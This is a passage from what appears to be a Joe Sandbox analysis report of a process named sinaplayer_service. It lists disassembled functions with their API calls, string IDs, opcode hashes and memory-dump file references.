                                                                                                                                                                                                    • Instruction ID: 11415e6a9c3bddbc781d8edc95e55aaa862ba3ff513aa5e92c9da32ed212e1d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c7221229324b3ebca74fcd692b704c8b6ecbcb4c13169685875badce71faa8b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19514B70A2E351C6CB41A755CD5139E3BB4DB42B1DF244EA8E0D8C3A94DF35889C8AC6
                                                                                                                                                                                                    Function 00376790 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,8285FFAB,00000000,00000000,00000000,00000000,0000006C,8285FFAB,00000000,0000003C,00000000), ref: 0037682D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0AAAAAAA), ref: 003768D6
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,00000000,0AAAAAAA,8285FFAB,00000000,00000000), ref: 003768E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@D@std@@@std@@U?$char_traits@Unlock@?$basic_streambuf@Xlength_error@std@@
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1549073800-3788999226
                                                                                                                                                                                                    • Opcode ID: 18882ced57dbf7574177b4fb12531454f8db27f67b158f28dcf6541595677209
                                                                                                                                                                                                    • Instruction ID: 0c483846b050d9730facef4b32335bbde13733a05e59a8dcfbdbe6a77f9fe22c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18882ced57dbf7574177b4fb12531454f8db27f67b158f28dcf6541595677209
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED5192B2A00109AFCF15DF58CD92AAEBBB9FF88300F148569F9099F355D735A910CB90
                                                                                                                                                                                                    Function 6C572E64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6C5AB64A
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6C5AB651
                                                                                                                                                                                                      • Part of subcall function 6C5801E3: DName::DName.LIBCMT ref: 6C58029A
                                                                                                                                                                                                      • Part of subcall function 6C5801E3: DName::operator+.LIBCMT ref: 6C5802A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::Name::operator+
                                                                                                                                                                                                    • String ID: CV:
                                                                                                                                                                                                    • API String ID: 2649573449-3725821052
                                                                                                                                                                                                    • Opcode ID: 6ac9b5507699f570defbd1eb558d58b24b1810b875b9b7e5872692d649e8fafb
                                                                                                                                                                                                    • Instruction ID: 1c9d30ed7f82baac0eb90764c2ff9ce22de3171e4daae7334333ee512e0dd337
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ac9b5507699f570defbd1eb558d58b24b1810b875b9b7e5872692d649e8fafb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6413731A4918ADFDF24CBAACCC9BA97BFAEB46314F140559D415C7B60D73088C9CB68
                                                                                                                                                                                                    Function 00392130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?unshift@?$codecvt@_WDH@std@@QBEHAAHPAD1AAPAD@Z.MSVCP120(0039FC64,00000000,00000008,?), ref: 003921DA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00392251
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@?unshift@?$codecvt@_H@std@@
                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                    • API String ID: 3553067384-244998873
                                                                                                                                                                                                    • Opcode ID: 865ac42321f3807758accf0bc0991c3a6994a3ff365f6ad09415793c055b712e
                                                                                                                                                                                                    • Instruction ID: 0ae7b82fe6a0eb1ad33d81fa4b2164950de7c43dcfd6277870c4bd4d366ad5b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 865ac42321f3807758accf0bc0991c3a6994a3ff365f6ad09415793c055b712e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941E631A00609AFDF16CBA8C884BEEBBB8FF09320F544619D511B7681D735A984CBA0
                                                                                                                                                                                                    Function 00380CE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C52C0,?,00000001,?,00386079,00000000,00000005,?,?,?,?,?,?,8285FFAB), ref: 00380D5D
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,00000000,y`8,6C6C52C0,?,00000001,?,00386079,00000000,00000005), ref: 00380D90
                                                                                                                                                                                                      • Part of subcall function 00380C20: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C3A
                                                                                                                                                                                                      • Part of subcall function 00380C20: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000,00000005), ref: 00380C5E
                                                                                                                                                                                                      • Part of subcall function 00380C20: memcpy.MSVCR120(00000000,00386079,?,00000000,?,6C6C52C0,y`8,00380D3F,?,00000000,y`8,?,00000001,?,00386079,00000000), ref: 00380C9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@memcpy$Xout_of_range@std@@
                                                                                                                                                                                                    • String ID: string too long$y`8
                                                                                                                                                                                                    • API String ID: 433638341-4268077810
                                                                                                                                                                                                    • Opcode ID: 02c7a222a09f88070413f6c44a40faac3ba485b0ff6224655c9db5dc94ffb619
                                                                                                                                                                                                    • Instruction ID: e11c6cfb9f8d158c0303502e476afb2c146ceb8ccf642f4a6372ace65d1ef3f6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c7a222a09f88070413f6c44a40faac3ba485b0ff6224655c9db5dc94ffb619
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63312C323003105BDB7DBE9CD88095AF7A9EF81710710496EE485CB751C770E84CC790
                                                                                                                                                                                                    Function 0038E400 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(?), ref: 0038E482
                                                                                                                                                                                                    • wcscpy_s.MSVCR120 ref: 0038E49E
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000), ref: 0038E4B6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryProcessReadwcscpy_s
                                                                                                                                                                                                    • String ID: ptime
                                                                                                                                                                                                    • API String ID: 2069118419-1897943179
                                                                                                                                                                                                    • Opcode ID: e7b7ac2e487cce016890a43ffee488fffd2c9496d611a9226f2f71eb0e9ef921
                                                                                                                                                                                                    • Instruction ID: fb42f70769ae6d10a4649470c0c5d11504eca9d86051098e8571d7b6f419d551
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7b7ac2e487cce016890a43ffee488fffd2c9496d611a9226f2f71eb0e9ef921
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2210672A003045BDB22EEAAD84679AB3E8EF48310F1046BEE84EC7150E671E9459791
                                                                                                                                                                                                    Function 0038D620 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C56E0,00000000,?,0038CF97,00000000,00000000,?,000000FF,00000001,?,00000000,000000FF,8285FFAB,6C6C2CC0,6C6C56E0), ref: 0038D63B
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,6C6C2CC0,6C6C56E0,00000000,?,0038CF97,00000000,00000000,?,000000FF,00000001,?,00000000,000000FF,8285FFAB,6C6C2CC0), ref: 0038D65A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xlength_error@std@@
                                                                                                                                                                                                    • String ID: string too long$Vll
                                                                                                                                                                                                    • API String ID: 1004598685-1565140922
                                                                                                                                                                                                    • Opcode ID: 76903932ce7b92c2f184a987e79b90b4b7c14be002c8d33cab1ebfeedb20f58d
                                                                                                                                                                                                    • Instruction ID: caceac59ce3397f095340af46b10b824977cb3f7e4d0c606a7d33fc3359c2004
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76903932ce7b92c2f184a987e79b90b4b7c14be002c8d33cab1ebfeedb20f58d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A211D6323183185B87267F6CF84185AF7E9FFD57613510A6FF05AC72A0EB61A8048798
                                                                                                                                                                                                    Function 00374960 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?,?,00000000,-00000002), ref: 00374977
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?), ref: 003749C3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,00374F85,00000000,00000000,?,?,?,?,003722E9,?,?,00000000), ref: 003749CF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 1370519046-2556327735
                                                                                                                                                                                                    • Opcode ID: e7bd6f1e8c04be801765dd787ffbd59f8915b17a7dfe9d36f203acd848b8b3ab
                                                                                                                                                                                                    • Instruction ID: 3a634abd33e590cada17d7d88250c50973eba5cbb909089216d24b7e821ac6de
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bd6f1e8c04be801765dd787ffbd59f8915b17a7dfe9d36f203acd848b8b3ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5111B1326207045BCB329F78E88096BB3A9BF96320B118E2EE59AC7250D738E4088751
                                                                                                                                                                                                    Function 003712F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long), ref: 00371304
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?), ref: 0037134D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00371359
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Xlength_error@std@@memcpy
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 1370519046-2556327735
                                                                                                                                                                                                    • Opcode ID: 713b9566fc95a9fb22a09296e6ccd4363e301a44fcfb8b0bdded38dcfe79a50d
                                                                                                                                                                                                    • Instruction ID: 992285da92cd222036cf10087a88a6f9bc021bcb38216fd244b9379ba8307c98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 713b9566fc95a9fb22a09296e6ccd4363e301a44fcfb8b0bdded38dcfe79a50d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 411126372103045BEB329E7CDC8462EB7D9ABA0320F148E3AE49AC7681D734D8488760
                                                                                                                                                                                                    Function 0038A530 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_New_Locimp@_Locimp@locale@std@@CAPAV123@_N@Z.MSVCP120(00000000,8285FFAB), ref: 0038A561
                                                                                                                                                                                                    • ?_Xruntime_error@std@@YAXPBD@Z.MSVCP120(bad locale name), ref: 0038A575
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B518,000000FF), ref: 0038A5D1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Locimp@_Locimp@locale@std@@New_V123@_Xruntime_error@std@@
                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                    • API String ID: 79456547-1405518554
                                                                                                                                                                                                    • Opcode ID: c9ef146b8455736338bd30b1b1a18a004935ff928326342e3500c32b2ed479f4
                                                                                                                                                                                                    • Instruction ID: 1086932fd016ac29085d8fa75838d46653ac8c6ba22521cd990ed07f34d488de
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ef146b8455736338bd30b1b1a18a004935ff928326342e3500c32b2ed479f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29215BB1904648DFDF16EF68D801BFEBBB8EF46310F14416AE442A7680D7355A44C791
                                                                                                                                                                                                    Function 6C568E94 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlUnwind.KERNEL32(?,6C585811,80000026,00000000,?,?), ref: 6C58580C
                                                                                                                                                                                                    • _local_unwind2.MSVCR120(?,?,?), ref: 6C585825
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Unwind_local_unwind2
                                                                                                                                                                                                    • String ID: &$02CV
                                                                                                                                                                                                    • API String ID: 2435528123-3673091860
                                                                                                                                                                                                    • Opcode ID: 08fa5132f181e4f9eae58ab18fcdfec19aa44055ae53d403cbe459245075b778
                                                                                                                                                                                                    • Instruction ID: 5446cb2072402a9d49fdebbbe3f2f1ccaafe3446f7dce5281059b39a361f36d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08fa5132f181e4f9eae58ab18fcdfec19aa44055ae53d403cbe459245075b778
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B114971900214DBEB00DF85CC80B8AFBA4FB09314FA50561E915ABB56D375EC84CBE2
                                                                                                                                                                                                    Function 0038AD50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,?,00000000), ref: 0038ADB4
                                                                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000,S:(ML;;NW;;;S-1-16-4096),00000018,00000000), ref: 0038ADCC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,S:(ML;;NW;;;S-1-16-4096),00000018,00000000), ref: 0038ADE6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • S:(ML;;NW;;;S-1-16-4096), xrefs: 0038AD6C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DescriptorSecurity$??3@ConvertSaclString
                                                                                                                                                                                                    • String ID: S:(ML;;NW;;;S-1-16-4096)
                                                                                                                                                                                                    • API String ID: 1527178151-1713697446
                                                                                                                                                                                                    • Opcode ID: 77ea40905ff7221e65158e7854523a90a6d8a6e50cc11ec017ee9e14bdb23a24
                                                                                                                                                                                                    • Instruction ID: 6e7cb2dede820ba90c9a052c0250e0945465c0c85495b79a1cbbbbab269a162d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77ea40905ff7221e65158e7854523a90a6d8a6e50cc11ec017ee9e14bdb23a24
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6112EB1E1020CEBDF11DFE5C855BEEB7B8AB08305F104069E815F6180D7759A09CBA5
                                                                                                                                                                                                    Function 003881D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?,8285FFAB,?,0039B190,000000FF,?,00388981,?,8285FFAB,?,?,00000001,?,00000001,00000000,0039A9DB), ref: 00388202
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(0000010D,00000000,?,?,?,?,?,?,00388981,?,8285FFAB,?,?), ref: 0038823D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,00388981), ref: 0038824C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@Base@internal@base@@CallbackD@2@@std@@D@std@@FilePath@base@@U?$char_traits@Unsafe@V?$allocator@V?$basic_string@
                                                                                                                                                                                                    • String ID: file_name
                                                                                                                                                                                                    • API String ID: 1700762032-3621721704
                                                                                                                                                                                                    • Opcode ID: c276f25c8eb9b3c7fa08e8aa1864b73aea8c90b2fcf541c1289c718901891c77
                                                                                                                                                                                                    • Instruction ID: e2aad09f51738c3bcb5898c7a26d40935c51216cc0e6bd2e87432e110d73f908
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c276f25c8eb9b3c7fa08e8aa1864b73aea8c90b2fcf541c1289c718901891c77
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 341186B181424CEFDF06EB94DD45FEEBBB8FB05714F00456AE806A7281DB755A44CB50
                                                                                                                                                                                                    Function 0037D2F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(vector<T> too long,?,?,003771C3,?,8285FFAB,00000000,00000000,00000000,0000003C,00000000), ref: 0037D324
